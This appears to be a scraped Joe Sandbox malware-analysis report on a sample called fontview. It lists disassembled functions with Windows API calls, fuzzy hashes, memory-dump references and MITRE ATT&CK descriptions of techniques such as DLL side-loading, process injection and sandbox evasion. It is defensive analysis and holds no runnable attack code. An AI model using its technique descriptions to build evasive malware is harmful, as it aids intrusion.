Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CloseHandle$ErrorFileLastUnmapView
String ID:
API String ID: 4017539725-0
Opcode ID: 1f7536b180434f0ac689f1fd93ed1486ba2fcd2b55e6192a352b8c4e4ef55d60
Instruction ID: 79f660d10e505635d13e7438cecf30ec9b8fed93fcc1d4ef52dd99797ee5355a
Opcode Fuzzy Hash: 1f7536b180434f0ac689f1fd93ed1486ba2fcd2b55e6192a352b8c4e4ef55d60
Instruction Fuzzy Hash: 92314D71204351DFD710CF65D884B2BB7E8FB88750F418A1DF855C7280EB75D8088B92

Function 10024090 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,B7A91B76,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 100240D2
LeaveCriticalSection.KERNEL32(?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 10024107
PostQueuedCompletionStatus.KERNEL32(?,00000057,?,00000000,B7A91B76,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?), ref: 10024133
SetLastError.KERNEL32(00000057,B7A91B76,?,?,?,?,0000000F,10050B38,000000FF,?,10024076,?,?,?), ref: 1002413A

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompletionEnterErrorLastLeavePostQueuedStatus
String ID:
API String ID: 1216617850-0
Opcode ID: 527145bfde23408dc2ef0d79ea1e4c64725fdf5e0d848d6576dc0aa07ecb7eaf
Instruction ID: d1afc4b1f62b75d7c0d42d46145dd7902132c798b5be5b94712711f6fd68f30f
Opcode Fuzzy Hash: 527145bfde23408dc2ef0d79ea1e4c64725fdf5e0d848d6576dc0aa07ecb7eaf
Instruction Fuzzy Hash: F321CF32600255EFDB10CF84DC84B9ABBF8FB44750F528669F9198B290CB759884CB50

Function 100252C0 Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32(1002594E,00000000,00000000,00000000,1002594E,00000000), ref: 100252D2
CreateFileMappingA.KERNEL32(1002594E,00000000,00000002,00000000,00000000,00000000), ref: 100252E6
MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,?,00000000), ref: 10025329
CloseHandle.KERNEL32(?), ref: 1002533F

Part of subcall function 100252A0: GetLastError.KERNEL32(1002533A), ref: 100252A0

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingSizeView
String ID:
API String ID: 322783378-0
Opcode ID: a72341e326a4ba0fbb02c033ca57f4eff7cf59df7aa94b10707fb8fa9e828f03
Instruction ID: b24b83d2de12238dc06bc647823d72b1e2335c8e7f7e86260e440beeb8542a3f
Opcode Fuzzy Hash: a72341e326a4ba0fbb02c033ca57f4eff7cf59df7aa94b10707fb8fa9e828f03
Instruction Fuzzy Hash: 4F11A076600616BFE710DF68EC05B69BBB8FB08311F50422AFD01D3680D7B1A9649BE8

Function 100201C0 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,100227E0,?,1001ED0E,B7A91B76), ref: 100201F1

Part of subcall function 10020310: InterlockedCompareExchange.KERNEL32(000001BF,00000100,000000FF), ref: 1002036A

_free.LIBCMT ref: 10020215
HeapDestroy.KERNEL32(?,?,?,?,?,?,100227E0,?,1001ED0E,B7A91B76), ref: 10020243
HeapCreate.KERNEL32(?,?,?,?,?,?,?,?,100227E0,?,1001ED0E,B7A91B76), ref: 10020252

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Heap$CompareCreateDestroyExchangeFreeInterlocked_free
String ID:
API String ID: 3571060031-0
Opcode ID: 78171274b88b9d871781253e762ba40eb7b37c92cc86dd6b7c56485abf7519fb
Instruction ID: 0a878298919a2728ada9c9bda282240638a9b5f958c97604bce3e13ab8e5967f
Opcode Fuzzy Hash: 78171274b88b9d871781253e762ba40eb7b37c92cc86dd6b7c56485abf7519fb
Instruction Fuzzy Hash: 901106B520070AEBD704CFA5D884B9AFBB9FF08344F50421AE90897651EB71F924CBA0

Function 1001B503 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1001B524
_free.LIBCMT ref: 1001B553
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,1001B3A2,?,000001C8), ref: 1001B573
HeapFree.KERNEL32(00000000,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B57A

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Heap_free$FreeProcess
String ID:
API String ID: 1072109031-0
Opcode ID: 557abc633146d36798c19daa65f0b5d008b94df4e8b7e6fe234b61a76df1c4f3
Instruction ID: 91e55399d9fdf6679953e435a265fa2e3a507e988a5e8b74e9227a28433c2d31
Opcode Fuzzy Hash: 557abc633146d36798c19daa65f0b5d008b94df4e8b7e6fe234b61a76df1c4f3
Instruction Fuzzy Hash: F0113532400F11EFDB619F65DD85A27BBEAFF04756705992EE19A4A921CB32F890CB00

Function 10025220 Relevance: 6.1, APIs: 4, Instructions: 51threadsleepCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 10025230
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 10025242
SwitchToThread.KERNEL32(?,?,?,?,B7A91B76,?,?,?,?,?,10050C98,000000FF), ref: 10025263
Sleep.KERNEL32(00000001,?,?,?,?,B7A91B76,?,?,?,?,?,10050C98,000000FF), ref: 10025272

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Thread$CompareCurrentExchangeInterlockedSleepSwitch
String ID:
API String ID: 2093090637-0
Opcode ID: 04a259b299e80969bc2d1559d06b55689e7ce4389a5ecaf7031aa6dca42bf6a5
Instruction ID: f6dbf606553bdfc6012b380ff7cb12dc7a9431c74cd62dc39b8d8cbb32ce41fd
Opcode Fuzzy Hash: 04a259b299e80969bc2d1559d06b55689e7ce4389a5ecaf7031aa6dca42bf6a5
Instruction Fuzzy Hash: 64012636A40132DBDB21D7A4ECD87ADF358FB47363F914135ED87820C0C672484992A8

Function 10020260 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1002027A

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

_free.LIBCMT ref: 10020282
_malloc.LIBCMT ref: 100202D9
_malloc.LIBCMT ref: 100202E6

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _free_malloc$ErrorFreeHeapLast
String ID:
API String ID: 2483110480-0
Opcode ID: f7696e20da9f14cc8a4f9f273da0e532d3d92c2e7cd30629e5baf4350a69fc1c
Instruction ID: b96996ba9dd0fdd4b47136e9c24c81bb7b11f053f0dbecd90a5a6174a1790e6f
Opcode Fuzzy Hash: f7696e20da9f14cc8a4f9f273da0e532d3d92c2e7cd30629e5baf4350a69fc1c
Instruction Fuzzy Hash: 681109B5501200DADB11DF14ED85B86BFA9EF41315F0880A9EE089E29BE7B6E414DBA4

Function 1003849B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 100384B2

Part of subcall function 10038AD4: ___AdjustPointer.LIBCMT ref: 10038B1D

_UnwindNestedFrames.LIBCMT ref: 100384C9
___FrameUnwindToState.LIBCMT ref: 100384DB
CallCatchBlock.LIBCMT ref: 100384FF

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 9314967b18044089f415324ef535ab2f519643b3b7824ee7fb655c0c72ac471c
Instruction ID: 989c8a7310246bee1fd08c7f23ef03ea6940c226f7113538dbc51997d19096da
Opcode Fuzzy Hash: 9314967b18044089f415324ef535ab2f519643b3b7824ee7fb655c0c72ac471c
Instruction Fuzzy Hash: F3011336000209BFCF138F55CC05ECA3BBAFF58755F118054FA186A120D736EA61EBA1

Function 10017439 Relevance: 6.0, APIs: 4, Instructions: 38timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,?,?,?,10016F76,?,?), ref: 10017445
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,10016F76,?,?), ref: 10017453
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017466
GetTickCount.KERNEL32 ref: 10017478

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: Time$CountFileLocalSystemTickUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 2988263349-0
Opcode ID: e7936d27054c44839712e425be5c1da52c9c64f107c8cd8e01f798dca73fca39
Instruction ID: e9295d616fd35ee15893a1400ce62d95032bf78b27ac2fe2c3c9e10ff6d825b8
Opcode Fuzzy Hash: e7936d27054c44839712e425be5c1da52c9c64f107c8cd8e01f798dca73fca39
Instruction Fuzzy Hash: 24F03177A00225ABDB00DBE9CD85ACB7BBDFB88250F404023EB05D3664D6B49545DF90

Function 10018235 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001823A

Part of subcall function 10018A47: __EH_prolog.LIBCMT ref: 10018A4C
Part of subcall function 10018A47: std::locale::_Init.LIBCPMT ref: 10018A91

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

std::locale::_Init.LIBCPMT ref: 100182C4

Part of subcall function 1003274C: __EH_prolog3.LIBCMT ref: 10032753
Part of subcall function 1003274C: std::_Lockit::_Lockit.LIBCPMT ref: 1003275D
Part of subcall function 1003274C: std::locale::_Setgloballocale.LIBCPMT ref: 10032779
Part of subcall function 1003274C: _Yarn.LIBCPMT ref: 1003278F

Strings

inc\http\HttpConnection.cpp, xrefs: 10018248

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: std::locale::_$H_prologInit$H_prolog3LockitLockit::_SetgloballocaleYarn_mallocstd::_
String ID: inc\http\HttpConnection.cpp
API String ID: 3634387935-15934736
Opcode ID: b8e81a0581a06a1258dea67b2edc56d44d9bd5ea9022d2f4a26446fb18cf1ade
Instruction ID: 7a1205773bd905cc226a88309ac9bc09dfb51d4ddb2d57aec835063900d9c3eb
Opcode Fuzzy Hash: b8e81a0581a06a1258dea67b2edc56d44d9bd5ea9022d2f4a26446fb18cf1ade
Instruction Fuzzy Hash: 8241C1B5600B418FC325CF59C580A96FBF4FF48314B50896ED89A8BB11E7B4BA09CF50

Function 10003256 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100032C6

Strings

string too long, xrefs: 100032ED
req, xrefs: 1000328C

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: req$string too long
API String ID: 4104443479-3134357765
Opcode ID: 8c6eb53e26efdb99629278785807a9547f397b84b6f4148008f3d644793ba4bd
Instruction ID: f34db192f8e0fa3b1fa1e0aeedf2e1d9bd4896eeb5cd9540ea6668629b64f2b9
Opcode Fuzzy Hash: 8c6eb53e26efdb99629278785807a9547f397b84b6f4148008f3d644793ba4bd
Instruction Fuzzy Hash: E111B231300740ABEB35DEA9D84195BB7EDEF427D0B10892EF956CB249CB71E908C7A0

Function 10019351 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100193B5

Strings

invalid string position, xrefs: 100193E8
string too long, xrefs: 100193F2

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: fe610288dba0ea71c4f34b643ab66fc5b79ff27ef753e082791bae47dea014b6
Instruction ID: 33c90798f0d8516c084e0f09cf76161ef6dc691a2bb1ff66f4c7af30e0da5eef
Opcode Fuzzy Hash: fe610288dba0ea71c4f34b643ab66fc5b79ff27ef753e082791bae47dea014b6
Instruction Fuzzy Hash: 2C1184717107049BC724CE58D894E5AB7EAEB85750B20492EE8A2CF6C1DBB1EA84C790

Function 10004472 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10004477
wsprintfA.USER32 ref: 100044BA

Strings

%.2X, xrefs: 100044AE

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: H_prologwsprintf
String ID: %.2X
API String ID: 1529278910-213608013
Opcode ID: 6d29badc7abd6babc7931a4f00e66ec026234c9abe38375157b2317c3f440c38
Instruction ID: ab478701061cdb77f35751579b8944a13045e9843e2e555ae6caed241adfc7f2
Opcode Fuzzy Hash: 6d29badc7abd6babc7931a4f00e66ec026234c9abe38375157b2317c3f440c38
Instruction Fuzzy Hash: 9D012176D00159ABDB00DFD9C881AEFFBB8FF48255F50446EE956E7201D734AA448BE0

Function 10011361 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

CoCreateGuid.OLE32(?), ref: 1001138D
_fprintf.LIBCMT ref: 100113A5
__snprintf.LIBCMT ref: 100113F3

Strings

create guid error, xrefs: 10011397

Memory Dump Source

Source File: 00000006.00000002.3294540499.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.3294488575.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294663907.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294727720.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3294889651.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.3295392619.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_fontview.jbxd

Yara matches

Similarity

API ID: CreateGuid__snprintf_fprintf
String ID: create guid error
API String ID: 2959897907-1010078425
Opcode ID: 4cea7cf2b984337b4d7d4ffe6108a3fc19ca67f450e3d562278f7069529bb91a
Instruction ID: 88e1e5261fbf5aae0ab1c042631421d14db4c6bfa5234099037d4dc45f47e2ec
Opcode Fuzzy Hash: 4cea7cf2b984337b4d7d4ffe6108a3fc19ca67f450e3d562278f7069529bb91a
Instruction Fuzzy Hash: 5BF0B4B2D082846FEF06D7B0DC86EDD3FB8DB11645F004116E900DF183EA64E689CB91

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
